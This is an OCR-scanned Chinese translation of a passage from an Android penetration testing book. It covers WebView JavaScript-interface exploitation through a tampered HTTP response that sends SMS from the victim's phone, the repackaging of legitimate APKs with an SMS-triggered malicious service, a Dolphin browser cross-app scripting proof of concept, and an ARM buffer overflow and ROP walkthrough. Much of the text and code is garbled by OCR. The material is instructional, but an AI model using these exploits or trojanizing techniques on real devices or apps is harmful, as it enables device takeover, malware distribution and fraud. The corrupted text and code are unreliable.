党， 以 便 使 用 file// 和 data// 协议 显示 网 页 和 其 他 内 容 ， 可 以 用 于 从 文件 系统 加 载 文 件 和 
数据 内 容 。 webview 也 用 于 各 种 Android 应 用 程序 ， 例 如 提供 注册 和 登录 功能 的 应 用 程序 。 
它 通 过 在 应 用 程序 的 布局 中 构建 其 移动 网 站 ， 来 显示 应 用 程序 中 的 Web 内 容 。 我 们 将 在 下 一 
中 进一步 讨论 WebKit 及 其 泻 染 引擎 。 对 于 本 和 草 ， 我 们 将 只 关心 使 用 WebKit 的 那些 应 用 程 


J 二 


在 应 用 中 使 用 WebView 


在 应 用 程序 中 使 用 webview 非常 简单 和 直接 。 假设 我 们 希望 我 们 的 整个 活动 都 是 一 
个 webview 组 件 ， 从 http://examplewebsite.com 加 载 内 容 。 


下 面 是 在 Android 应 用 程序 中 实现 webview 的 代码 示例 : 


WebView webview = new WebView(this); 
setContentView(webview) ; 
webview. LoadUrl("http://vulnerable-website.com" ); 


A-*FEBHNS He? KIARA RRA TR AEH > FE webview 实现 中 使 
用 以 下 命令 启用 Wa (默认 设置 为 False ) 


setJavascriptEnabled(true); 
前 面 的 命令 确保 JavaScript 可 以 在 应 用 程序 中 执行 ， 并 利用 注册 界面 。 


1R D) Aa WF 


想象 一 下 这 种 情况 ， 应 用 程序 在 不 安全 的 网 络 中 使 用 ， 人 允许 攻击 者 执行 中 间 人 攻击 〈 更 多 中 

间 人 攻击 的 内 容 请 参见 OWASP 网 

站 https//www.owasp.org/index.php/Man-in-the-middle_attack ) ° 如 果 攻 击 者 可 以 访问 网 络 ， 
则 他 们 可 以 修改 请 求 和 对 设备 的 响应 。 这 表示 他 们 能 够 修改 响应 数据 ， 并 且 如 果 从 网 站 加 载 
JavaScript 内 容 ， 则 可 以 完全 控制 JavaScript 内 容 。 


事实 上 ， 通 过 使 用 它 ， 攻 击 者 甚至 可 以 使 用 JavaScript 来 调用 手机 上 的 某 些 方法 ， 例 如 向 另 
一 个 号 码 发 送 和 短信， 拨打 电话 ， 甚 至 使 用 诸如 Drozer 之 类 的 工具 获取 远程 shell 。 


让 我 们 举 个 简单 的 例子 ， 来 说 明 webview 漏洞 的 可 能 性 。 在 这 里 ， 我 们 将 使 用 Joshua Drake 
的 GitHub 仓库 ( https://github.com/jduck/VulnwebView/ ) 中 的 ， 由 他 创建 的 概念 证 明 。 这 
个 POC 在 应 用 程序 中 使 用 webview ， 来 简单 加 载 一 个 URL 并 且 加 载 一 个 位 

于 http://droidsec.org/addjsif.html 的 网 页 (如 果 这 个 链接 打 不 开 ， 你 可 以 访 

问 http//attify.com/lpfa/addjsif.html ) ° 


以 下 是 Eclipse 中 代码 示例 的 屏幕 截图 ， 其 中 使 用 名 称 Android 创建 JavaScript + : 


public class MoinActivity extends Activity { 


BSuppresslint({ “SetJavasecriptEnobled”, *“JavascriptInterface” }) 
protected void onCreate(Bundle saovedInstanceState) { 
super .onCreate( sovedinstanceState}: 
setContentView(R. loyout. activity main): 


final Button button = (Button) findViewByIdfR.id. buttonl):; 
button. setOnClickListener(new View. OnClickListener() { 
public void on€lick(View v} { 
‘/ Perform action on click 
WebView wyWebView = CWebView) findViewBy1d(R.id.webView!): 
myWebVies,. reload}; 


4 a 
“oo 


HebView myWebView = (WebView) findViewById(R.id.webYtew!): 


WebSecttings webSettings = myWebView. getSettings(): 
webSettings. setJovatcriptEnabled(true) ; 


ii terrible Leg 
nyWebView.addJovascriptInterface(new WebAppInterface(this), "Android"); 





我 们 还 可 以 从 源 代 码 中 创建 apk 文件 ， 只 需 右 键 单 击 项 目 ， 然 后 选 
择 Export as an Android Application (导出 为 Android 应 用 程序 ) 。 一 旦 我 们 运行 应 用 程序 
并 监听 Burp 代理 中 的 流量 ， 我 们 将 看 到 应 用 程序 中 指定 的 URL 的 请 求 ， 如 以 下 屏幕 截图 所 
7m: 


Ragusii to higi droidi ag ao (6655.55. 159 


Intercept is on 


ot! a od osm, ork 
‘roy -tenniection: besp-alive 
“ache-Coartrel: mo-ceche 
1 bet ache 
电 3 fet (hil eee licet ian home eee l deat [on el p98. 0,4) * +9008. 6 


er -Agent Horilia’S.@ (Linux: U] Andiroid 4.1.12 en-us} Galasy Mews - 4.7.1 = APD 15 = TILI Suildi IR Boo lever it o34. ha 
EHTEL, like Geeks) Wersian/4.2 Hobile Safario. 5 
cept-Qreodings grip, deflate 
coept-Language: en-US 
Cipt- {ħars : utf- fae 8240-1, utf-ié, "gat. T 





T 


: Fri, 27 Sep 2013 21:53:20 GMT 
onnection: keep-alive 
ontent-Length: 288 


title>Test Pape</title> 
script type="text/Javascript™> 
unction sayhit) { 
document. body. innerHTML += ‘<br>hi from javascript!*; 


body onload="sayhil )"> 
ello world! 
input type="button" onclick="sayhif i" value="click me!" /> 





让 我 们 假设 攻击 者 需要 利用 这 个 漏洞 应 用 程序 ， 来 使 用 受害 者 的 设备 向 一 个 号 码 发 送 和 短信。 
以 下 屏幕 截图 显示 了 修改 后 的 响应 的 样子 : 


|HT TRiL.1 2 

Serwer: nging/l. 1.19 

iOwte: Pri, 17 Jan 2014 10:34:59 Gat 
Content-Type: text/html 

Last-Modified: Fri, 27 Sep 2013 21:55:20 GAT 
Connection: Feep-alive 

Content-Length: 260 


ctitlesTeat Popec/titles 

¿script type="text /Javascript™> 

function execute() { var senda = 

findroid.gpetClass(). fortiane(" android. telephony. Sens anager”) .gettet hod ("get bef ault”, null). ineokednul), mull); 
sors. send Texthessape(™ +1231 23567", null, “paed”, mull, nullj;} 


ty GPL AES 

Le hed 

tbody onload="execute( |) 

Hello world! 

cinpwt type="button™ onclicks"execute()" value=e"click sel" /Fy 
jea biy 

<i html Y 





一 旦 我 们 点 击 Forward (和 转发) 按钮， 邮件 将 从 受害 者 的 设备 发 送 到 攻击 者 指定 的 号 码 。 


上 述 内 容 简 单 地 调用 smsManager() ， 以 便 将 包含 文本 pwned 的 SMS 发 送 到 的 预定 义 号 码 。 


这 是 一 个 利用 存在 汤 洞 的 webview 应 用 程序 的 简单 示例 。 事 实 上 ， 你 可 以 尝试 调用 不 同 的 方 
法 或 使 用 Drozer 从 设备 获取 远程 shell。 你 还 可 以 访 

= https://labs.mwrinfosecurity.com/blog/2013/09/24/webview-addjavascriptinterface-remote-c 
阅读 通过 Drozer 利用 webview 的 更 多 信息 。 


7.2 &®REK APK 


由 于 Google 的 不 严格 政策 ， 将 应 用 上 传 到 Play 商店 时 ， 许 多 开发 人 员 上 传 了 恶意 应 用 和 软 
件 ， 目 的 是 从 使 用 者 的 装置 田 取 私人 资料 。 Google Play 中 存在 的 大 多 数 亚 意 软件 只 是 合法 
应 用 程序 的 受 感 业 版 本 。 和 恶意 软件 作者 只 需要 一 个 扶 正 的 应 用 程序 ， 反 编译 它 ， 插 入 自己 的 
恶意 组 件 ， 然 后 重新 编译 它 ， 以 便 分 发 到 应 用 商店 和 感染 用 户 。 这 可 能 听 起 来 很 复杂 ， 但 实 
际 上 ， 这 是 一 个 非常 简单 的 事情 。 


TERMI BAD A HE BRINE A OIF RS KAA > RACH LRA o HUT LAR IE 
的 最 简单 的 方法 之 一 是 编写 一 个 简单 的 恶意 应 用 程序 ， 并 将 其 所 有 恶意 活动 放 在 服务 中 。 此 
外 ， 我 们 在 AndroidManifest ,xml 文件 中 添加 广播 接收 器 ， 以 便 指 定 的 事件 (例如 接收 SMS) 
能 够 触发 我 们 的 服务 。 


因此 ， 以 下 是 创建 受 感染 版 本 的 合法 应 用 程序 的 简单 步骤 : 


1 使 用 apktool 解压 缩 应 用 程序 ， 如 下 所 示 : 


apktool d [appname].apk 


2， 反 编译 恶意 应 用 程序 来 生成 Java 类 的 smali 文件 。 在 这 里 ， 我 们 需要 将 所 有 的 恶意 活动 
panelled 。 此外， 如 果 你 有 smali 语言 的 经 验 ， 你 可 以 直接 从 smali 本 身 创 建 服务 。 
假设 恶意 服务 的 名 称 是 malware.smali ° 


3， 接 下 来 ， 我 们 需要 将 malware.smali 文件 复制 到 smali 文件 夹 ， 它 位 于 我 们 及 编译 的 合法 
应 用 程序 的 文件 夹 中 。 我们 把 malware.smali 中 的 软件 包 名 称 的 所 有 引用 更 改 为 合法 应 
H FE 的 软件 包 名 称 ， 并 在 AndroidManifest. xml 中 注册 服务 o 


fi 7k B > 我 们 需要 在 AndroidManifest. xml 文件 中 添加 另 一 行 sw TAT 


<service droid:name = "malware.java"/> 


4. 此外， 我 们 需要 注册 一 个 广播 接收 器 来 触发 服务 。 在 这 种 情况 下 ， 我 们 选择 短信 作为 触 
发 器 ， 如 下 面 的 代码 所 示 : 


<recelver android:name="com.legitimate.application.service"> 
<intent-filter> 
<action android: name="android.provider.Telephony.SMS_ RECEIVED" /> 
</intent-filter> 
</receiver> 


5. 使 用 apktool 重新 编译 应 用 ， 像 这 样 : 


apktool b appname/ 


一 旦 应 用 程序 使 用 apktool 重新 编译 ， 新 的 apk 将 为 被 感染 的 合法 版 本 。 向 手机 发 送 邮 件 可 
能 会 自动 触发 此 恶意 软件 。 如 果 恶 意 软件 服务 需要 的 权限 比 合 法 应 用 程序 更 多 ， 我 们 还 需要 
手动 在 AndroidManifest.xml 文件 中 添加 缺少 的 权限 。 


7.3 广告 库 中 的 漏洞 


Google os 大 部 分 免费 Android 应 用 都 会 使 用 广告 来 赚 取 收益 。 然而 ， 通 常 广告 库 
本 身 存 在 漏洞 ， 使 得 整个 应 用 程序 容易 受到 茶 种 严重 的 威胁 。 


别 特定 应 用 程序 tae > 我 们 可 以 使 用 dex2jar/apktool ia Æ WA fa I% A & A 

， 并 分 析 创 建 的 文件 夹 。 还 可 以 在 http://www.appbrain.com/stats/libraries/ad 中 找 
Android pana 它们 的 应 用 程序 。 广告 库 可 能 具有 许多 漏洞 ， 例 如 
上 一 节 中 讨论 的 webview 漏洞 ， 不 安全 的 文件 权限 或 任何 其 他 漏洞 ， 这 可 能 会 导致 攻击 者 破 
坏 整 个 应 用 程序 ， 获 得 有 反 向 shell 或 甚至 创建 后 门 。 


7.4 Android 中 的 跨 应 用 脚本 


分 应 用 程序 脚本 汤 洞 是 一 种 Android 应 用 程序 漏洞 ， 攻 击 者 可 以 绕 过 同 源 策 略 并 在 应 用 程序 
置 中 访问 存储 在 Android 文件 系统 上 的 敏感 文件 。 ad EAA 
a /data/data/[ 应 用 程序 包 名 称 ] 位 置 中 的 所 有 内 容 。 汤 洞 的 根本 原因 是 ， 应 用 程序 允许 内 容 使 
用 受信 任 区 域 的 访问 权限 ， 在 不 受信 任 区 域 中 执行 。 


ho FR HR WF] AZ Jt] 42, Æ Web | 览 Bs ? 攻击 会 变 得 更 加 严 $ 4 A sh eH HES aK Bl 览 器 存 
储 的 所 有 Cookie 和 其 他 信息 ， 并 将 其 发 送 给 攻击 者 。 


甚至 一 些 著名 的 应 用 程序 ， 如 Skype，Dropbox， 海 豚 浏 览 器 等 ， 旱 期 版 本 中 都 存在 跨 应 用 程 
序 脚本 漏洞 。 


让 我 们 来 看 看 海豚 浏览 器 HD 中 的 漏洞 ， 例 如 ， 由 Roee Hay 和 Yair Amit 发 现 的 漏洞 。 此 示 
例 中 使 用 的 存在 漏洞 的 海豚 浏览 £S HD 应 用 程序 版 本 为 6.0.0， 以 后 的 版 本 中 修补 了 漏洞 。 


海豚 浏览 器 HD 有 一 个 名 为 BrowserActivity 的 漏洞 活动 ， 它 可 以 被 其 他 应 用 程序 以 及 其 他 参 
HX Wal JF] o eens. 它 来 调用 海豚 浏览 器 HD 并 打开 特定 的 网 页 ， 以 及 恶意 的 
JavaScript。 以 下 屏幕 截图 显示 了 POC 代码 以 及 通报 


http://packetstormsecurity.com/files/view/105258/dolphin-xas.txt ) 


public class MoinActivity extends Activity { 


static final String mPackage = “mobi.mgeek. TunnyBrowser": 
static final String mClass = “BrowserActivity": 

static final String mri = "http: //adityagupta.net/"; 
static final String mJavascript = “alert€document.domoain}”; 
static final int mSleep = 2000: 


BOverride 
public void onCreate(Bundle savedInstanceState) { 


} 


super .onCreate(savedInstanceState): 
setContentView CR. layout. activity main); 
startBrowserActivity(murl); 
try { 

Thread. sleepiasleep): 
} 


catch CInterruptedException e} {} 
startBrowserActivity(" javascript:" + mJavascript);: 


private void startBrowserActivity(String url) { 

Intent res = new IntentC*android. intent. action. VIEW"): 

res. setComponent(new ComponentNome(mPackage, mPackage+"."+mClass)); 
res.setData(Uri.parse(url)); 

startActivity(res);: 





E> A RRR PAO Leg > RAAT A http://adityagupta.net 网 站 以 及 JavaScript 
3% Be alert(document.domain) ， 它 将 在 提示 框 中 简单 地 弹出 域名 。 一旦 我 们 在 我 们 的 手机 上 
打开 这 个 恶意 应 用 程序 ， 它 将 调用 海豚 浏览 器 HD， 打 开 URL 和 我 们 指定 的 JavaScript 代 
码 ， 如 下 面 的 截图 所 示 : 


The page at 'http://adityagupta.net' says: 


adityagupta.net 








总 结 
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在 本 章 中 ， 我 们 了 解 了 Android 中 的 不 同 攻击 向 量 ， 从 渗透 测试 者 的 角度 来 看 ， 这 非常 有 
用 。 本 章 应 该 用 做 对 不 同 攻击 向 量 的 快速 演练 ; 然而 ， 建 议 你 尝试 这 些 攻击 向 量 ， 党 试 修改 它 
们 ， 并 在 现实 生活 中 的 渗透 测试 中 使 用 它们 © 


在 下 一 章 中 ， 我 们 将 离开 应 用 程序 层 ， 专 注 于 Android 平台 的 基于 ARM 的 利用 。 


第 八 章 ARM 利用 


作者 : Aditya Gupta 
译 者 : 飞龙 
It : CC BY-NC-SA 4.0 


在 本 章 中 ， 我 们 将 了 解 ARM 处 理 器 的 基础 知识 ， 和 ARM 世界 中 存在 的 不 同类 型 的 漏洞 。 我 
们 其 至 会 继续 利用 这 些 漏洞 ， 以 便 对 整个 场景 有 个 清晰 地 了 解 。 此 外 ， 我 们 将 研究 不 同 的 
Android root 攻击 和 它们 在 漏洞 利用 中 的 基本 漏洞 。 考虑 到 目前 大 多 数 Android 智能 手机 都 
使 用 基于 ARM 的 处 理 器 ， 对 于 活 透 测试 人 员 来 说 ， 了 解 ARM 及 其 附带 的 安全 风险 至 关 重 
要 。 


8.1 ARM 采 构 导论 


ARM 是 基于 精简 指令 集 (RISC) 的 架构 ， 这 意味 着 其 指令 比 基 于 复杂 指令 集 (CISC) 的 机 
ZT > ARM 处 理 器 几乎 遍布 我 们 周围 的 所 有 设备 ， 如 智能 手机 ， 电 视 ， 电 子 书 阅读 器 和 
E SURANA ° 


ARM 总 共有 16 个 可 见 的 通用 寄存 器 ， 为 RO-R15。 在 这 16 个 中 ， 有 5 个 用 于 特殊 目的 。 
以 下 是 这 五 个 寄存 器 及 其 名 称 : 


e R11: 帧 指针 (FP) 

e。 R12: 过 程 内 寄存 器 (IP) 
e R13: 栈 指针 (SP) 

。 R14: 链接 寄存 器 (LR) 
。 R15: 程序 计数 器 (PC) 


下 面 的 图 展示 了 ARM 架构 : 


第 八 章 ARM 利用 





在 五 个 里 面 ， 我 们 会 特别 专注 于 这 三 个 ， 它 们 是 : 


o 堆栈 指针 (SP) : 这 是 保存 指向 堆栈 顶部 的 指针 的 寄存 器 
o 链接 寄存 器 (LR) : 当 程序 进入 子 过 程 时 存储 返回 地 址 
o 程序 计数 器 (PC) : 存储 要 执行 的 下 一 条 指令 


这 里 要 注意 的 一 点 是 ，PC 将 总 是 指向 要 执行 的 指令 ， 而 不 是 简单 地 指向 下 一 条 指令 。 
这 是 由 于 被 称 为 流水 线 的 概念 ， 指 令 按 照 以 下 顺序 操作 : 提取 ， 解 码 和 执行 。 为 了 控制 
星 序 流 ， 我 们 需要 控制 PC 或 LR 中 的 值 (后 者 最 终 引 导 我 们 控制 PC) 。 


re 


83 


执行 模式 
ARM 有 两 种 不 同 的 执行 模式 : 


。 ARM 模式 : Æ ARM 模式 下 ， 所 有 指令 的 大 小 为 32 位 
。 Thumb 模式 : 在 Thumb 模式 下 ， 指 令 大 部 分 为 16 位 


执行 模式 由 CPSR 寄存 器 中 的 状态 决定 。 还 存在 第 三 模式 ， 即 Thumb-2 模式 ， 它 仅仅 是 
ARM 模式 和 Thumb 模式 的 混合 。 我 们 在 本 章 不 会 深入 了 解 ARM 和 Thumb 模式 之 间 的 区 
别 ， 因 为 它 超出 了 本 书 的 范围 。 


8.2 建立 环境 


在 开始 利用 ARM 平台 的 漏洞 之 前 ， 建 议 你 建立 环境 。 即使 Android SDK 中 的 模拟 器 可 以 通 
过 模拟 ARM 平台 来 运行 ， 大 多 数 智 能 手机 也 是 基于 ARM 的 ， 我 们 将 通过 配置 QEMU ( 它 是 
一 个 开源 硬件 虚拟 机 和 模拟 器 ) 开始 ARM 漏洞 利用 。 


为 了 在 Android 模拟 器 /设备 上 执行 以 下 所 有 步骤 ， 我 们 需要 下 载 Android NDK 并 使 用 
Android NDK 中 提供 的 工具 为 Android 平台 编译 我 们 的 二 进 制 文件 。 但 是 ， 如 果 你 使 用 Mac 
环境 ， 安装 QEMU 相对 容易 ， 可 以 通过 键入 brew install qemu 来 完成 。 现在 让 我 们 在 
Ubuntu 系统 上 配置 QEMU 。 遵循 以 下 步骤 : 


1， 第 一 步 是 通过 安装 依赖 来 下 载 并 安装 QEMU， 如 图 所 示 : 


sudo apt-get build-dep qemu 
wget http://wiki.qemu-project.org/download/qgemu - 
1.7.0.tar.bz2 


2. EPR? RNR SBA BQEMU? ERA ARM? READAIAE co 因此 ， 我 们 将 简 
单 地 解压 缩 归 档 文 件 ， 访 问 该 目录 并 执行 以 下 命令 : 


./configure --target-list=arm-softmmu 
make && make install 


3 一旦 QEMU 成 功 安 装 ， 我 们 可 以 下 载 ARM 平台 的 Debian 镜像 来 进行 利用 练习 。 所 需 下 
载 列 表 位 于 http://people.debian.org/~aurel32/qemu/armel/ ° 

4， 这 里 我 们 将 下 载 格式 为 qcow2 的 磁盘 映像 ， 它 是 基于 QEMU 的 操作 系统 映像 格式 ， 也 就 

是 我 们 的 操作 系统 为 debian_squeeze armel standard.qcow2 ° 内 核 文 件 应 该 

是 vmlinuz-2.6.32-5-versatile ° RAM 磁盘 文件 应 坊 是 initrd.img-2.6.32-versatile ° 

一 旦 我 们 下 载 了 所 有 必要 的 文件 ， 我 们 可 以 通过 执行 以 下 命令 来 启动 QEMU 实例 : 


qemu-system-arm -M versatilepb -kernel vmlinuz-2.6.32-5- 
versatile -initrd initrd.img-2.6.32-5-versatile -hda 
debian_squeeze_armel_standard.qcow2 -append 
"root=/dev/sdail" --redir tcp:2222::22 


5. redir 命令 只 是 在 登录 远程 系统 时 使 用 端口 2222 启用 Ssh。 一 旦 配置 完成 ， 我 们 可 以 
使 用 以 下 命令 登录 到 Debian 的 QEMU 实例 : 


ssh root@[ip address of Qemu] -p 2222 


6. SBKRYSERAAA PF ZF BG? RUE root:root 。 一 旦 我 们 成 功 登 录 ， 我 们 将 
看 到 类 似 如 下 所 示 的 屏幕 截图 : 


adiex9e:~ adi$ ssh root@l192.168.148.132 -p 2222 
root@192.168.148.132's password: 
Linux debian-armel 2.6.32-5-versatile #1 Wed Sep 25 00:01:55 UTC 2013 armv5tejl 


The programs included with the Debian GNU/Linux system are free software; 
the exact distribution terms for each program are described in the 
individual files in /usr/share/doc/#/copyright. 


Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent 
permitted by applicable law. 

Last login: Mon Jan 20 20:58:49 2014 from 192.168.148.1 
root@debian-armel:~# f 





~ 大 党 N < 
3 基于 栈 的 简单 缓冲 区 溢出 
简单 来 说 ， 缓 冲 区 是 存储 任何 类 型 的 数据 的 地 方 。 当 缓冲 区 中 的 数据 超过 缓冲 区 本 身 的 大 小 
时 ， 会 发 生 溢出 。 然后 攻击 者 可 以 执行 溢出 攻击 ， 来 获得 对 程序 的 控制 和 执行 恶意 载荷 。 


让 我 们 使 用 一 个 简单 程序 的 例子 ， 看 看 我 们 如 何 利 用 它 。 在 下 面 的 截图 中 ， 我 们 有 一 个 简单 
的 程序 ， 有 三 个 欧 数 weak ， ShouldNotBeCalled 和 main ° 以 下 是 我 们 试图 利用 的 程序 


#include <stdio.h> 
#incLude <stdlib.h> 


void ShouldNotBeCalled(){ 
puts("I Should Never Be Called"); 
exit(0); 

} 


void vulnerableCchar *arg){ 


char buff[10]; 
strcpy(buff,arg); 


} 


int main(int argc, char **argv){ 
vulnerableCargv[1]); 
return(@); 





在 整个 程序 运行 期 间 ， 从 不 调用 ShouldNotBeCalled 2x © 

源 洞 函数 简单 地 将 参数 复制 到 名 为 putt 的 缓冲 区 ， 大 小 为 10 字 节 。 

一 旦 我 们 完成 程序 编写 ， 我 们 可 以 使 用 gcc 编译 它 ， 如 下 一 个 命令 所 示 。 此 外 ， 我 们 将 在 这 
里 禁用 地 址 空间 布局 随机 化 (ASLR) ， 只 是 为 了 使 场景 稍微 简单 一 些 。ASLR 是 由 OS 实现 
的 安全 技术 ， 来 防止 攻击 者 有 效 地 确定 载荷 的 地 址 并 执行 恶意 指令 。 在 Android 中 ，ASLR 
的 实现 始 于 4.0。 你 可 以 访 

由] http://www.duosecurity.com/blog/exploit -mitigations-in-android-jelly-bean-4-1 了 解 所 有 
Android 安全 实施 。 


echo 0 > /proc/sys/kernel/randomize_va_space 
gcc -g buffer_overflow.c -o buffer_overflow 


接 下 来 ， 我 们 可 以 简单 将 二 进 制 文件 加 载 到 GNU AAZ > 4K GDB， 然 后 开始 调试 它 ， 如 
下 面 的 命令 所 示 : 


gdb -q buffer_overflow 


现在 我 们 可 以 使 用 disass 命令 来 有 反 汇 编 特定 的 函数 ， 这 里 是 shouldNotBecalled ， 如 下 面 的 
截图 所 示 : 


(g0b) disass ShouldNotBecalled 

Dump of assembler code for function ShouldNotBecaltled: 

Ox G@OCOS84 080 ieta es isha: a eee ee oe push te) Lr 
6xOGGOeGcgse4s40c <ShouladNotBeCalled+4:>; add rii, sp, #4 
6x00006410 Shou LdNotBecal lLed+8s=: Lar r3, [pE, #16 ] 
68=x60008414 =<ShouldNotBeCalled+i2=: mow rë, r 
øöxOGOGRALS <ShouldNotBeclalled+16=: bl Ox8344 printf = 


OxGOeesb4aic <ShouldnNotBecalled+76:>: sub sp, rii, #4 

OGxKxOGOGOBAZO <ShouldNotBetalled«+74:: pop {rii, tr} 

OxOO0ees4a2z4 =<Shou LadaNotB Beca l lLed¢+28>: bx Lr 

øx00GGOE4JZ8 <ShoulLdNnotBecalled+32=>: andeg re. r6, re, tst rs 
assembler dump. 





正如 我 们 在 上 面 的 截图 中 可 以 看 到 的 ， ShouldNotBecalled 函数 从 内 存 地 址 Oxo0008408 开始 。 

如 果 我 们 查看 main 函数 的 反 汇 编 ， 我 们 看 到 漏洞 函数 在 oxoooossasa 被 调用 并 

在 0x000084a8 返回 。 因此 ， 由 于 程序 进入 漏洞 函 ee 受 攻击 的 siron EEEE 

BRR AB AK) > HOt RA EGE HATA A Ata aE LR ， 我 们 就 
能 够 控制 整个 程序 流程 。 


这 里 的 目标 是 估计 和 何 时 LR A a o RELA ShouldnotBeCalled 的 地 址 ， 以 便 调 
用 shouldNotBeCalled 欧 数 。 让 我 们 开始 使 用 一 个 长 参数 运行 程序 ， 如 下 面 的 命令 所 示 ， 看 看 
会 发 生 什 么 。 在 此 之 前 ， 我 们 还 需要 在 汤 洞 函数 和 strcpy 调用 的 地 址 设置 断 点 


b vulnerable 
b *<address of the strcpy call> 


一 旦 我 们 设置 了 断 点 ， 我 们 可 以 使 用 参数 AAAABBBBCCCC 来 运行 我 们 的 程序 ， 看 看 它 是 如 何 被 
Bato 我们 注意 到 ein 9 数 的 调用 处 命中 了 第 一 个 断 点 ， 之 后 在 strcpy 调用 处 命中 了 
下 一 个 断 点 。 一 旦 它 到 达 ， 我 们 可 以 使 用 x 命令 分 析 堆 栈 ， 并 指定 来 自 SP 的 地 址 ， 如 
下 面 的 截图 所 示 : 


(gdb?) r AAAABDABCCCT 
Starting program: frootfExplottatton/buffer_overflow AAAABBBACCCE 
Breaskpoint 1, main (arge=27, arogvetabebatd64) at buffer _overflow.c:ri15 


Wu Lnerablefardy 


2, Vulnerable (Carge@ubetaiteia “AAAABBBACCCC") at buffer_overflow.c: 
strepy( buff ,arg);: 


cogadb) 
12 } 

LB 8/108 Ssp 

Sa bebhasbes : "xpt öxbefiazefa Bnd666656 ox41414141 
Sxbesaibrea Cima 2 于 42 Fa Oma ta yaya OxbeBbateso Ox 00008448 
Sxbestaicos : S&xbesas doa = Oooo oag2 


(godb y E 





RATT VA A Bi > HER DARA A A RR A (ASCII : 41 代表 A，42 RRB? F 
+) 。 从 上 面 的 截图 中 ， 我 们 看 到 ， 我 们 仍然 需要 四 个 更 多 的 字 节 来 履 盖 返回 地 址 ， 在 这 种 


情况 下 是 0x000084a8 ° 


所 以 ， 最 后 的 字符 串 是 16 字 节 的 垃圾 ， 然 后 是 ShouldNotBecalled 的 地 址 ， 如 下 面 的 命令 所 
示 : 


r ‘printf "AAAABBBBCCCCDDDD\x38\x84" © 


我 们 可 以 在 下 面 的 截图 中 看 到 ， 我 们 已 经 将 IshouldNeverBeCalled 的 起 始 地 址 添加 到 了 参数 


Coch} disass [shou ldNeverBecalled 
| “Tg oiled code for mpi inl I 与 tsetse 


el chouldNeve rBec sLied+4> : 
shou ldNeverBecal Led+8>: =o r ; @xB8450 «<I 
“ShouldNeverBeCalled+12>: af 18 <puts> 


WeverBeCalled+26>: 8xB374 <extLt> 
PherheCalled4+274>: md ec rū, rō., rō, asr 
As sate Gunes: 
(gdb) x 10x Sap 
axbeharibesi: @xbesaieia EBaxeedsoaoag @x@gidgididi 
OoxbeBhartbra: ox42424242 S34 34545 Ooxbesbaitcoo Gx GGG084 a8 
GSxbehatcOs: Ooxbetasd64 
(gdb) r printf " AAAABBBBCCCCDDDD\ x38\ x84" 
The program being debugged has been started already. 
Start Lt from the beginning? (Cy or n) y 





请 注意 ， 由 于 这 里 是 小 端 结构 ， 字 节 以 相反 的 顺序 写 入 。 一 旦 我 们 运行 它 ， 我 们 可 以 看 到 程 
JP ShouldNotBeCalled 艾 数 被 调用 ， 如 下 面 的 截图 所 示 : 


rt -areelio=g-fExplottation® /buUuTTer owverT low printf ARAABBBBCÇCCCCDOODCDO x38) x4” 
E should never be called 
root@debtlan-armel:-/Explottation#e 





8.4 返回 导向 编程 


在 大 多 数 情况 下 ， 我 们 不 需要 调用 程序 本 身 中 存在 的 另 一 个 函数 。 相 有 反 ， 我 们 需要 在 我 们 的 
攻击 向 量 中 放置 shellcode， 这 将 执行 我 们 在 shellcode 中 指定 的 任何 恶意 操作 。 但是， 在 大 

多 数 基 于 ARM 平台 的 设备 中 ， 内 存 中 的 区 域 是 不 可 执行 的 ， 这 会 阻止 我 们 放置 并 执行 
shellcode ° 


因此 ， 攻 击 者 必须 依赖 于 所 谓 的 返回 导向 编程 (ROP) ， 它 是 来 自 内 存 不 同 部 分 的 指令 片段 
的 简单 链接 ， 最 终 它 会 执行 我 们 的 shellcode。 这 些 片 段 也 称 为 ROP gadget。 为 了 链接 
ROP gadget， 我 们 需要 找到 存在 跳 转 指 令 的 gadget， 这 将 允许 我 们 跳 到 另 一 个 位 置 。 


例如 ， 如 果 我 们 在 执行 程序 时 有 反 汇 编 seed48() ， 我 们 将 注意 到 以 下 输出 : 


(gdb) disass seed4g 

Dump of assembler code for function seed48: 

Oxd6657458 <seedd4ieO>: ldr r3, [pe, #32] |; 0x40057480 <seed48+40> 
Ox4605745c <seed4hed>: push (r4, lr} 

Ox40057460 <seeddh+B>: ldr rd, [pc, #28] |; 0x40057484 <seed48+44> 
Ox40057464 <Seed4hel2>: add r3, pe, r3 

6x4OO57468 <seeddheld>: add rå, r3, rå 


Ox4O05746c <seeddh+26>: mov ri, rd 
Oxd0e57470 <seeddhe2d>: bl Ox40057638 <seedda r> 
OxqOO5T47d <seeddh+7Bs: 
0x40057478 <Seed4he32>: 
Ox4005747c <seed4h+36>: | 
486 <seed4h+4@>: mule pe; r4, rii 
<seedqh+44>: ande: r3, rō, r8, lsr #4 





如 果 我 们 查看 有 汇编 ， 我 们 将 注意 到 它 包 含 一 个 ADD 指令 ， 后 面 跟着 一 个 POP 和 BX 指 
令 ， 这 是 一 个 完美 的 ROP gadget。 这 里 ， 攻 击 者 可 能 会 想到 ， 为 了 将 其 用 作 ROP gadget， 
首先 跳 到 控制 r4 的 POP 指令 ， 然 后 将 比 /bin/sh 的 地 址 小 6 的 值 放 入 r4 中 ， 将 ADD 指令 
的 值 放 入 LR Po 因此 ， 当 我 们 跳 回 到 ADD 也 就 是 Re = R4 + 6 时 ， 我 们 就 拥有 

了 /bin/sh 的 地 址 ， 然 后 我 们 可 以 为 R4 指定 任何 垃圾 地 址 并 且 为 LR 指定 system() 的 地 
址 。 


这 意味 前 我们 将 最 终 跳 转 到 使 用 参数 /bin/sh 的 system() ， 这 将 执行 shell。 以 同样 的 方 
式 ， 我 们 可 以 创建 任何 ROP gadget， 并 使 其 执行 我 们 所 需要 的 任何 东西 。 由 于 ROP 是 开发 
中 最 复杂 的 主题 之 一 ， 因 此 强烈 建议 你 自己 尝试 ， 分 析 反 汇编 代码 并 构建 漏洞 。 


8.5 Android root 利用 


从 早期 版 本 的 Android 开始 ，Android root 漏洞 开始 出 现 于 每 个 后 续 版 本 和 不 同 的 Android 设 
备 制造 商 的 版 本 中 。 Android root 简单 来 说 是 获得 对 设备 的 访问 特权 ， 上 默认 情况 下 设备 制造 
商 不 会 将 其 授予 用 户 。 这 些 root 攻击 利用 了 Android 系统 中 存在 的 各 种 漏洞 。 以 下 是 其 中 一 
些 的 列表 ， 带 有 漏洞 利用 所 基于 的 思想 : 


e Exploid : 基于 udev 中 的 CVE-2009-1185 漏洞 ， 它 是 Android 负责 USB 连接 的 组 件 ， 
